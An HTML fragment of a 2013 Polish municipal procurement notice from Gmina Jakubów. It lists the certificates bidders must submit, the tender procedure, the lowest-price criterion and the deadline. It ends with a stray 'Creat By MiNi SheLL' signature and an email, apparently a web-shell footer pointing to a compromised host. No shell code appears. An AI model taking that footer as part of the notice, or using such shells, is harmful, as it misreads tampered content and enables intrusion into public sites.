<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz podwykonawców, w przypadku gdy wykonawca powierzy część lub całość zamówienia  
        podwykonawcom. Parafowany wzór umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jakubow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jakubów, Jakubów 55, 05-306 Jakubów pokój Nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 10:30, miejsce: Urząd Gminy Jakubów, Jakubów 55, 05-306 Jakubów pokój Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com